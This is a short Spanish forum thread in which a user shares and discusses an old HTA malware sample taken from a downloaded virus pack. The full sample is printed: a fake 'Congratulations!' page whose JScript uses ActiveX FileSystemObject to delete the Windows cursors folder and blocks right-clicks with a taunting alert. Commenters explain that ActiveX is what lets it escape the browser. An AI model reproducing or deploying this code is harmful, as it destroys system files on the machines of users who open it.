Foro de elhacker.net

Hola me descargue un pack con muchos troyanos virus etc.. y ahora los estoy analizando.

[code=javascript]<HTML>
<HEAD>
 
<TITLE>Virus</TITLE>
 
<script language="JScript">
 
var fs = new ActiveXObject("Scripting.FileSystemObject");
var a = fs.DeleteFolder("c:\\windows/cursors");
 
</script>
 
<HTA:APPLICATION
       ID="oHTA"
       APPLICATIONNAME="ComplexHTA"
       CAPTION="yes"
       ICON="ComplexHTA.ico"
       MAXIMIZEBUTTON="no"
       MINIMIZEBUTTON="no"
       SHOWINTASKBAR="no"
       SINGLEINSTANCE="no"
       SYSMENU="no"
       VERSION="1.0"
       WINDOWSTATE="normal">
 
<script language="javascript">
 
var message="Now Hang On Here!";
 
function click(e) {
if (document.all) {
if (event.button == 2) {
alert(message);
return false;
}
}
if (document.layers) {
if (e.which == 3) {
alert(message);
return false;
}
}
}
if (document.layers) {
document.captureEvents(Event.MOUSEDOWN);
}
document.onmousedown=click;
 
</script>
 
</HEAD>
 
<BODY BGCOLOR="000000" TEXT="FFFFFF" LINK="6BC8F2" VLINK="6BC8F2" ALINK="6BC8F2">
 
<BR>
<BR>
<BR>
 
<CENTER>Congratulations!</CENTER>
 
<P>
 
<center><BUTTON onclick="self.close()">Click Here To Close
 
</BUTTON></center>
 
</HTML>
 

[/code]

Supongo que sera muy muy antiguo porque:

var fs = new ActiveXObject("Scripting.FileSystemObject");
var a = fs.DeleteFolder("c:\\windows/cursors");

Borra la carpeta cursors así sin mas y luego se burla de que no puede pulsar el botón para salir  ;D
Que os parece?

No creo que javascript actualmente pueda borrar una carpeta del sistema xD

no es el jscript solo... es el activeX que lo hace vulnerable, permitiendo escapar del navegador